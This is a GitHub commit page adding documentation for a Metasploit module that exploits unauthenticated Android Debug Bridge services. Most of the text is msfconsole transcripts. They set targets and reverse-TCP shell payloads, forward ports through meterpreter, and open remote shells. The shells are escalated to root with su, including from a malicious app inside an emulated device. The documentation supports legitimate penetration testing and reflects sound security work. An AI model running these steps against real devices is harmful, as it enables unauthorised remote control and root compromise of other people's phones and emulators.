Skip to content

Commit

Permalink
Land #16361, docs for adb_server_exec
Browse files Browse the repository at this point in the history
  • Loading branch information
@h00die
h00die committed Mar 21, 2022
2 parents a4956bf + 4cd021c commit ff7b017
Showing 1 changed file with 238 additions and 0 deletions.
238 changes: 238 additions & 0 deletions documentation/modules/exploit/android/adb/adb_server_exec.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,238 @@
## Vulnerable Application

Writes and spawns a native payload on an Android device that is listening
for Android Debug Bridge (ADB) debug messages.


## Installation Steps

To emulate Android devices, download and install [Android Studio](https://developer.android.com/studio/).

1. Start Android Studio and create a device using Device Manager.
1. Start an emulated device, either via Android Studio or using the `emulator` executable from Android SDK.

List available AVDs and start one with the emulator:

```
$ /path/to/Android/Sdk/emulator/emulator -list-avds
Galaxy_Nexus_API_29
$ /path/to/Android/Sdk/emulator/emulator -avd Galaxy_Nexus_API_29
```

For physical devices, refer to:

* https://developer.android.com/studio/command-line/adb


## Verification Steps

1. `msfconsole`
1. `use exploit/android/adb/adb_server_exec`
1. `set rhosts [host]`
1. `set rport [port]`
1. `set target [target]`
1. `run`
1. You should get a session


## Options


## Scenarios

### Remote Exploitation

```
msf6 > use exploit/android/adb/adb_server_exec
[*] Using configured payload linux/armle/shell_reverse_tcp
msf6 exploit(android/adb/adb_server_exec) > set rhosts 192.168.200.135
rhosts => 192.168.200.135
msf6 exploit(android/adb/adb_server_exec) > set rport 5555
rport => 5555
msf6 exploit(android/adb/adb_server_exec) > show targets
Exploit targets:
Id Name
-- ----
0 armle
1 x86
2 x64
3 mipsle
msf6 exploit(android/adb/adb_server_exec) > set target 1
target => 1
msf6 exploit(android/adb/adb_server_exec) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(android/adb/adb_server_exec) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] 192.168.200.135:5555 - Connecting to device...
[+] 192.168.200.135:5555 - Connected to device:
device::ro.product.name=sdk_gphone_x86;ro.product.model=Android SDK built for x86;ro.product.device=generic_x86;features=fixed_push_symlink_timestamp,apex,fixed_push_mkdir,stat_v2,abb_exec,cmd,abb,shell_v2
[+] 192.168.200.135:5555 - Command executed, response:
command=WRTE
arg0=0x99
arg1=0xb
data=
[*] 192.168.200.135:5555 - Command Stager progress - 100.00% done (1142/1142 bytes)
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.135:60382 ) at 2022-03-20 19:55:10 -0400
id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input)
```


### Emulated Device Local Exploitation

When running Android devices in an emulator with Android Studio, the ADB
service is exposed only on the local network interface. However, the
service is accessible to all local users and may allow one user to
compromise another user's emulated device if authentication is disabled.

Setting up a port forward to the ADB service allows this module to exploit
ADB over an existing session:

```
meterpreter > portfwd add -l 1234 -p 5555 -r 127.0.0.1
[*] Local TCP relay created: :1234 <-> 127.0.0.1:5555
meterpreter >
Background session 1? [y/N]
msf6 > use exploit/android/adb/adb_server_exec
[*] Using configured payload linux/armle/shell_reverse_tcp
msf6 exploit(android/adb/adb_server_exec) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(android/adb/adb_server_exec) > set rport 1234
rport => 1234
msf6 exploit(android/adb/adb_server_exec) > show targets
Exploit targets:
Id Name
-- ----
0 armle
1 x86
2 x64
3 mipsle
msf6 exploit(android/adb/adb_server_exec) > set target 1
target => 1
msf6 exploit(android/adb/adb_server_exec) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(android/adb/adb_server_exec) > set lhost 192.168.200.130
lhost => 192.168.200.130
```

Successful exploitation results in `adb` user privileges with `shell` SELinux context,
leading to `root` privileges on the device by using `su`:

```
msf6 exploit(android/adb/adb_server_exec) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] 127.0.0.1:1234 - Connecting to device...
[+] 127.0.0.1:1234 - Connected to device:
device::ro.product.name=sdk_gphone_x86;ro.product.model=Android SDK built for x86;ro.product.device=generic_x86;features=fixed_push_symlink_timestamp,apex,fixed_push_mkdir,stat_v2,abb_exec,cmd,abb,shell_v2
[*] Sending stage (36 bytes) to 192.168.200.135
[+] 127.0.0.1:1234 - Command executed, response:
command=WRTE
arg0=0x95
arg1=0xb
data=
[*] 127.0.0.1:1234 - Command Stager progress - 100.00% done (1142/1142 bytes)
[*] Command shell session 2 opened (192.168.200.130:4444 -> 192.168.200.135:60332 ) at 2022-03-20 18:30:56 -0400
id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
su
id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:su:s0
```


### Emulated Device Privilege Escalation

When running Android devices in an emulator with Android Studio, it is possible
for apps to communicate with the ADB service on the host's local network interface.
This allows a malicious app to request a shell on the device via ADB, leading to
elevation of privileges by creating a new session with `shell` privileges.

Untrusted Android apps have `untrusted_app` SELinux context, do not have `shell`
privileges and cannot execute `su`:

```
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=10149(u0_a149) gid=10149(u0_a149) groups=10149(u0_a149),3003(inet),9997(everybody),20149(u0_a149_cache),50149(all_a149) context=u:r:untrusted_app_25:s0:c512,c768
su
/system/bin/sh: <stdin>[2]: su: inaccessible or not found
exit
```

However, apps can communicate with the ADB service associated with the emulated
device (port `5555` in this example) on the host `10.0.2.2`. Setting up a port
forward to the ADB service allows this module to exploit ADB over the session:

```
meterpreter > portfwd add -l 1234 -p 5555 -r 10.0.2.2
[*] Local TCP relay created: :1234 <-> 10.0.2.2:5555
meterpreter >
Background session 1? [y/N]
msf6 > use exploit/android/adb/adb_server_exec
[*] Using configured payload linux/armle/shell_reverse_tcp
msf6 exploit(android/adb/adb_server_exec) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(android/adb/adb_server_exec) > set rport 1234
rport => 1234
msf6 exploit(android/adb/adb_server_exec) > show targets
Exploit targets:
Id Name
-- ----
0 armle
1 x86
2 x64
3 mipsle
msf6 exploit(android/adb/adb_server_exec) > set target 1
target => 1
msf6 exploit(android/adb/adb_server_exec) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(android/adb/adb_server_exec) > set lhost 192.168.200.130
lhost => 192.168.200.130
```

Successful exploitation results in `adb` user privileges with `shell` SELinux context,
leading to `root` privileges on the device by using `su`:

```
msf6 exploit(android/adb/adb_server_exec) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] 127.0.0.1:1234 - Connecting to device...
[+] 127.0.0.1:1234 - Connected to device:
device::ro.product.name=sdk_gphone_x86;ro.product.model=Android SDK built for x86;ro.product.device=generic_x86;features=fixed_push_symlink_timestamp,apex,fixed_push_mkdir,stat_v2,abb_exec,cmd,abb,shell_v2
[*] Sending stage (36 bytes) to 192.168.200.135
[+] 127.0.0.1:1234 - Command executed, response:
command=WRTE
arg0=0xb
arg1=0xb
data=
[*] 127.0.0.1:1234 - Command Stager progress - 100.00% done (1142/1142 bytes)
[*] Command shell session 2 opened (192.168.200.130:4444 -> 192.168.200.135:59846 ) at 2022-03-20 02:57:52 -0400
id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
su
id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:su:s0
```

0 comments on commit ff7b017

Please sign in to comment.